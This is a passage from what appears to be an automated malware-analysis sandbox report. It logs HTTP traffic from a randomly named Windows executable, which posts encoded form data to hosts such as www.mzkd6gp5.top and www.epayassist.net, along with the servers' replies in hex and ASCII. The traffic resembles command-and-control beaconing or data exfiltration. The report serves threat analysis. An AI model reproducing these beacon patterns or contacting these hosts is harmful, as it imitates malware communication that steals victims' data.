                                                        Data Ascii: gnlxDxt=OIoVhjzUgo83iZiMFcdafQR34zJunVxDUllrw+OlpYJXn4DPlq3Rj1iQ0cfpw1gWs0jhKokdYnHNNBn6j0mSqAdQXit/5CHjVYBijmOlco+Jqp91d8VUMQeUucrF8sKXcxizwsEf0Osm40XQ8vVmk78m8el7AXoJu1BIzejX53GDqwXcAFnim2Wrsh2VOTjuxTeonv0NDCGa9MHsLMPR7+E=
                                                        Dec 11, 2024 04:51:31.383346081 CET979INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:51:31 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c8%2F5kJjrBmek715l2SyUKPjYGc%2Fyb9f3b%2B2uowfXD%2BnYKwH5UohBMkVU6JzvNhI%2B9%2BbPgazFRr%2B%2FDK2qeOmuELlWZyedVgs9wMiLsXZnMf3vBHoLdPKRbw8INlne3Yze566T"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f02844159ac19cb-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2048&min_rtt=2048&rtt_var=1024&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=823&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.449870172.67.158.81805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:32.526695967 CET10905OUTPOST /0hqe/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mzkd6gp5.top
                                                        Origin: http://www.mzkd6gp5.top
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 10304
                                                        Referer: http://www.mzkd6gp5.top/0hqe/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 4f 49 6f 56 68 6a 7a 55 67 6f 38 33 69 5a 69 4d 46 63 64 61 66 51 52 33 34 7a 4a 75 6e 56 78 44 55 6c 6c 72 77 2b 4f 6c 70 59 42 58 6b 4b 37 50 71 70 66 52 69 31 69 51 2b 38 66 6f 77 31 67 50 73 31 4c 6c 4b 6f 59 4e 59 6b 76 4e 4d 69 66 36 33 57 43 53 6b 41 64 51 4b 53 74 38 30 69 48 32 56 59 52 6d 6a 6d 65 6c 63 6f 2b 4a 71 6f 4e 31 4c 64 56 55 4f 51 65 54 70 63 72 7a 34 73 4b 72 63 31 32 4a 77 73 41 51 30 2f 4d 6d 34 55 6e 51 2b 61 68 6d 37 4c 38 67 76 75 6c 64 41 58 30 57 75 31 73 33 7a 65 2b 36 35 31 61 44 36 58 53 5a 62 30 48 54 31 46 79 69 73 68 4f 33 4a 68 61 74 6f 41 75 75 76 76 49 44 54 54 75 78 6d 2b 43 69 66 70 53 54 75 6f 75 77 74 45 6d 6a 67 79 79 78 66 63 79 38 5a 76 35 75 55 4b 38 76 67 7a 51 32 38 50 2f 6c 64 38 70 6f 44 6d 42 6e 71 4d 6f 43 55 63 54 67 71 47 6a 53 50 2f 48 72 34 71 73 52 79 4f 65 31 75 2b 52 69 43 46 32 68 42 54 67 2f 72 75 4d 31 59 31 7a 71 39 71 37 78 47 5a 30 75 54 79 59 30 33 57 71 34 37 38 39 49 55 69 69 53 53 48 32 76 6b 6b 33 69 61 4f [TRUNCATED]
                                                        Data Ascii: gnlxDxt=OIoVhjzUgo83iZiMFcdafQR34zJunVxDUllrw+OlpYBXkK7PqpfRi1iQ+8fow1gPs1LlKoYNYkvNMif63WCSkAdQKSt80iH2VYRmjmelco+JqoN1LdVUOQeTpcrz4sKrc12JwsAQ0/Mm4UnQ+ahm7L8gvuldAX0Wu1s3ze+651aD6XSZb0HT1FyishO3JhatoAuuvvIDTTuxm+CifpSTuouwtEmjgyyxfcy8Zv5uUK8vgzQ28P/ld8poDmBnqMoCUcTgqGjSP/Hr4qsRyOe1u+RiCF2hBTg/ruM1Y1zq9q7xGZ0uTyY03Wq4789IUiiSSH2vkk3iaOYd/6Ae9s8wzFSFoEASw6R9T+6kW7SdteHhAZjMnE0HOwgOt9VMLbT65DjZnWhGyVL4bGtOVznvTfPIvpSmESmtiTC5eGzCGwsLNFwl28ZjTt8rmREI/0CChhS190/Via62meujIxBhgyTJdN+y8P+LN6SjfTr1TZvkilC0Fj8iCd0eSUWhFzv2M3s0Uq7IacCAkjg3NMF6pnu4zNECxqNtU/sT5ucvN35x146DKSvpgJo19uBqsZTh/ERaL4DdLLIPJ1jacSsf60ljxpRyaIwaG9PEeNz7sTl9g8F0yXprWe3dOjSftPtdty2MGc69lFEtydvsi6Q1GIbu//zUuA5a2jcKbZn+iFbju6iDBEeFWueaOUPTD8DcYKC6ckT2EKO9+QEEcEHDlX7hf0nFRnLKM7o6RXl48yvLQUjT4wEuXSS2we5JpaA37AAXVtdnpHokhEAFL9WNsAMhRCws+pxbxK9DNrWmCZxvd7vW9l+F/0mIenAhCsH2s9Faaji1FSXwC53yqW+EFuuJ0uVq0M3ljLMqtmtJV/9VjFbf4gr/WlTviaWvFYxyQSzL70Xf+MQD/IaSrzETwK/5Y24Z5W4Hc/JsZ5mmAO3y3Gv74ltHj8xaeZaRfARUleFdkR0yA/fDzFOunX3RgkpVzsaPokegmYZWXqL7SnHs [TRUNCATED]
                                                        Dec 11, 2024 04:51:34.128335953 CET975INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:51:33 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxvZzdny1OjFc0eiEvBQcFx%2B%2B6xr55Y%2F9G%2BRI4lae%2BvGQL8W8EpdeWbGWLy%2FM0%2Fz6MxiCmqb1RXzBxQHOH8xFUKNS4xOaQxcdstuMbFRjAircETNKKhGScyGO1JGNEVvHgd0"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f0284520bb98cca-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2010&rtt_var=1005&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10905&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a
                                                        Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$
                                                        Dec 11, 2024 04:51:34.129868984 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.449876172.67.158.81805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:35.175901890 CET538OUTGET /0hqe/?gnlxDxt=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&Cpbp2=zjh46zEHi HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.mzkd6gp5.top
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Dec 11, 2024 04:51:36.729027033 CET1236INHTTP/1.1 404 Not Found
                                                        Date: Wed, 11 Dec 2024 03:51:36 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        CF-Cache-Status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q7mTnvEFmMTmwC4v9X3EfT64V60aSnizi2%2FeBU3yJ2V4JWnP3%2BlJhHIhziMH9uTq2CeYocS0tEZlhlxHxkcMSaWIN1iY%2BZUqF5MIrMfUQvPsBpKSjkMERmwIs0lYScXiZ7Bm"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8f0284629b13de96-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1480&rtt_var=740&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 [TRUNCATED]
                                                        Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly
                                                        Dec 11, 2024 04:51:36.729120970 CET85INData Raw: 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d
                                                        Data Ascii: error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                        Dec 11, 2024 04:51:36.729680061 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.449897208.91.197.27805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:42.490637064 CET809OUTPOST /sjh2/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.epayassist.net
                                                        Origin: http://www.epayassist.net
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 204
                                                        Referer: http://www.epayassist.net/sjh2/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 56 6d 68 44 46 61 51 2f 55 73 39 48 6a 4c 75 48 72 32 34 2f 5a 59 77 50 70 44 49 78 58 41 58 2f 6e 38 61 35 4b 44 58 4b 4b 34 54 78 72 75 6e 46 4f 41 4b 64 4e 50 73 38 4e 36 68 6a 50 35 50 77 31 47 49 30 32 66 54 61 51 6c 72 77 74 79 4b 77 6a 4f 79 2f 72 34 59 79 2b 74 6c 51 77 70 63 7a 6a 61 76 4f 33 53 46 56 73 4e 2f 77 4b 32 77 37 36 70 5a 6a 64 75 47 48 70 32 36 38 55 45 41 4d 71 77 73 4d 2f 79 43 67 79 31 34 32 71 68 37 62 6f 4f 61 55 46 71 70 42 45 7a 65 41 42 57 63 65 44 78 54 36 6f 51 49 30 6b 48 7a 69 6c 6c 62 35 76 49 52 6c 65 4b 38 30 4e 6a 75 68 6e 66 38 36 78 41 3d 3d
                                                        Data Ascii: gnlxDxt=VmhDFaQ/Us9HjLuHr24/ZYwPpDIxXAX/n8a5KDXKK4TxrunFOAKdNPs8N6hjP5Pw1GI02fTaQlrwtyKwjOy/r4Yy+tlQwpczjavO3SFVsN/wK2w76pZjduGHp268UEAMqwsM/yCgy142qh7boOaUFqpBEzeABWceDxT6oQI0kHzillb5vIRleK80Njuhnf86xA==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.449903208.91.197.27805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:45.155157089 CET829OUTPOST /sjh2/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.epayassist.net
                                                        Origin: http://www.epayassist.net
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 224
                                                        Referer: http://www.epayassist.net/sjh2/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 56 6d 68 44 46 61 51 2f 55 73 39 48 6a 6f 32 48 6e 33 34 2f 49 34 77 49 30 7a 49 78 65 67 58 37 6e 38 57 35 4b 43 6a 61 4b 74 37 78 72 4d 2f 46 50 42 4b 64 4b 50 73 38 47 61 68 69 52 4a 50 42 31 47 45 38 32 65 76 61 51 6b 50 77 74 7a 36 77 6a 2f 79 34 72 6f 59 6e 32 4e 6c 53 2b 4a 63 7a 6a 61 76 4f 33 53 52 7a 73 4e 6e 77 4a 48 41 37 37 49 5a 67 56 4f 47 47 68 57 36 38 51 45 41 79 71 77 74 6a 2f 7a 66 37 79 32 41 32 71 67 4c 62 6f 61 4f 58 50 71 6f 45 41 7a 65 51 53 54 41 61 48 68 32 75 6d 53 6b 7a 74 45 2f 77 67 6a 57 6a 2b 35 77 79 4d 4b 59 48 51 6b 6e 56 71 63 42 7a 71 48 75 4a 37 4b 39 4e 52 66 78 72 4e 4f 51 75 50 39 76 45 45 76 4d 3d
                                                        Data Ascii: gnlxDxt=VmhDFaQ/Us9Hjo2Hn34/I4wI0zIxegX7n8W5KCjaKt7xrM/FPBKdKPs8GahiRJPB1GE82evaQkPwtz6wj/y4roYn2NlS+JczjavO3SRzsNnwJHA77IZgVOGGhW68QEAyqwtj/zf7y2A2qgLboaOXPqoEAzeQSTAaHh2umSkztE/wgjWj+5wyMKYHQknVqcBzqHuJ7K9NRfxrNOQuP9vEEvM=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.449909208.91.197.27805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:47.824281931 CET10911OUTPOST /sjh2/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.epayassist.net
                                                        Origin: http://www.epayassist.net
                                                        Cache-Control: max-age=0
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Connection: close
                                                        Content-Length: 10304
                                                        Referer: http://www.epayassist.net/sjh2/
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Data Raw: 67 6e 6c 78 44 78 74 3d 56 6d 68 44 46 61 51 2f 55 73 39 48 6a 6f 32 48 6e 33 34 2f 49 34 77 49 30 7a 49 78 65 67 58 37 6e 38 57 35 4b 43 6a 61 4b 74 6a 78 6f 35 6a 46 4a 6d 2b 64 4c 50 73 38 46 61 68 6e 52 4a 50 63 31 47 63 34 32 65 69 74 51 6e 6e 77 73 56 6d 77 72 74 57 34 6c 6f 59 6e 30 4e 6c 54 77 70 64 78 6a 5a 58 4b 33 53 42 7a 73 4e 6e 77 4a 45 59 37 74 70 5a 67 58 4f 47 48 70 32 36 34 55 45 41 4a 71 7a 64 5a 2f 7a 62 72 75 58 67 32 70 41 62 62 76 70 6d 58 4e 4b 6f 47 4e 54 66 50 53 54 46 45 48 68 71 69 6d 57 6b 56 74 44 33 77 68 6c 58 61 35 49 55 56 53 49 41 37 4d 46 2f 6f 6c 39 74 77 68 32 61 39 2f 66 6f 5a 4c 4d 64 6b 49 63 49 68 54 39 48 48 53 61 6d 51 38 69 6e 62 59 46 35 52 59 44 57 63 72 75 72 50 70 76 79 51 76 44 61 6d 72 67 75 58 4e 4d 58 65 41 39 61 2f 30 4a 33 50 53 48 55 6c 2f 32 35 48 57 75 70 4a 68 51 78 72 31 2f 5a 31 4d 31 79 51 46 59 36 38 76 74 34 48 34 37 4d 6f 2b 4e 32 6d 59 64 42 62 63 46 68 37 56 42 57 54 38 68 47 78 4d 69 71 79 52 69 48 34 71 41 73 70 30 78 54 46 4f 65 [TRUNCATED]
                                                        Data Ascii: gnlxDxt=VmhDFaQ/Us9Hjo2Hn34/I4wI0zIxegX7n8W5KCjaKtjxo5jFJm+dLPs8FahnRJPc1Gc42eitQnnwsVmwrtW4loYn0NlTwpdxjZXK3SBzsNnwJEY7tpZgXOGHp264UEAJqzdZ/zbruXg2pAbbvpmXNKoGNTfPSTFEHhqimWkVtD3whlXa5IUVSIA7MF/ol9twh2a9/foZLMdkIcIhT9HHSamQ8inbYF5RYDWcrurPpvyQvDamrguXNMXeA9a/0J3PSHUl/25HWupJhQxr1/Z1M1yQFY68vt4H47Mo+N2mYdBbcFh7VBWT8hGxMiqyRiH4qAsp0xTFOeDNzhdnrPZZGmuJhWG6o5CWCcGvUXLmehAJtTL756RVM6uLIFDSVpXXeGLbj6DYTz091Jleqdr0KeU+m++QuID+hqvIHlWFQr1ecJHUGlI9cnlnYe57HTWK5OZD83FcnZwAHI1SwkE0GpBAPSbW4hv6qmxeBYRJOqkuwd94VfdgX5TtFCwaJMmzqe8ne97R8QFEtfmtJ2QXDB82FWftGNc3nD2NgPQpbKvbT7d4gUDUMste+V+1XMRNfkwihNGlMzi0TVdA49fBi5G1a38KSRkIe5X4uoLdA3Te6FGrN8f2IY02CwTSDdECUxrji1ouRYp3Gny2/kOjwASJqqDVizb641SSqEnkTOBHTsca/5qUnCcov4kKjSM057ZeJ26+RUGB/2AfdZy0o2Ih8WA4ja+L/GEVBUOZfa7ndCaOwqforX7byA72gEzGq/0wd6Z1bcsb3uboT3PzsmBI9DsMc0Mib5Qxayvr8pozajNaAhkx943SBdOFvF97UaXnVo0RONPkbfaTjtRdD86zaDX9zERk27HfSB3sKvNHnKnbK5neFXLEU4BOkQ4i0uHeYLTWE39OC2C6Z/BlaMSQ7o1rzPwo+FeBkpK4FTbRgwsFkjWs3kwjCXnxEipEBDAXJzgWvAAnpHAdDQkepq8kfy3UdWiPmriABQXXNSBT [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.449915208.91.197.27805904C:\Program Files (x86)\lgzGrOjvololjjsoFRADtoGpjLuGYWccGKiUvzLAxNNEyFVoiHYocAsJBDnznwPUWTHyZsN\mcPAaApkdo.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 11, 2024 04:51:50.473486900 CET540OUTGET /sjh2/?gnlxDxt=YkJjGs4lbp5ts7eeq38ve60glEoSeBv7n+jiAmf9K/aJhMvSfAmkEslPX5dpK+rGqB8Vqcj9eGPLpji1qr6bjKpF389iooxy/bfE0yZvpr3FHFNGtOhSTJw=&Cpbp2=zjh46zEHi HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.epayassist.net
                                                        Connection: close
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; McAfee)
                                                        Dec 11, 2024 04:51:51.917220116 CET1236INHTTP/1.1 200 OK
                                                        Date: Wed, 11 Dec 2024 03:51:51 GMT
                                                        Server: Apache
                                                        Referrer-Policy: no-referrer-when-downgrade
                                                        Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                        Set-Cookie: vsid=911vr4814347115532532; expires=Mon, 10-Dec-2029 03:51:51 GMT; Max-Age=157680000; path=/; domain=www.epayassist.net; HttpOnly
                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NN4qSiNia1AnbKNGDqeny2KROq2EoLbUhLjoxm2zR1oRCS/z4bto9oCA9fQ9Z0d7atWEHG2gH8l5jwaHEv42Kw==
                                                        Content-Length: 2610
                                                        Content-Type: text/html; charset=UTF-8
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 4e 4e 34 71 53 69 4e 69 61 31 41 6e 62 4b 4e 47 44 71 65 6e 79 32 4b 52 4f 71 32 45 6f 4c 62 55 68 4c 6a 6f 78 6d 32 7a 52 31 6f 52 43 53 2f 7a 34 62 74 6f 39 6f 43 41 39 66 51 39 5a 30 64 37 61 74 57 45 48 47 32 67 48 38 6c 35 6a 77 61 48
                                                        Data Ascii: <!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NN4qSiNia1AnbKNGDqeny2KROq2EoLbUhLjoxm2zR1oRCS/z4bto9oCA9fQ9Z0d7atWEHG2gH8l5jwaH
                                                        Dec 11, 2024 04:51:51.917275906 CET1236INData Raw: 45 76 34 32 4b 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22
                                                        Data Ascii: Ev42Kw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.epayassist.net/px.js?ch=1"></script><script type="text/javascript" src="http://www.epayassist.net/px.js?ch=2"></script><script t
                                                        Dec 11, 2024 04:51:51.917287111 CET256INData Raw: 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0d 0a 20
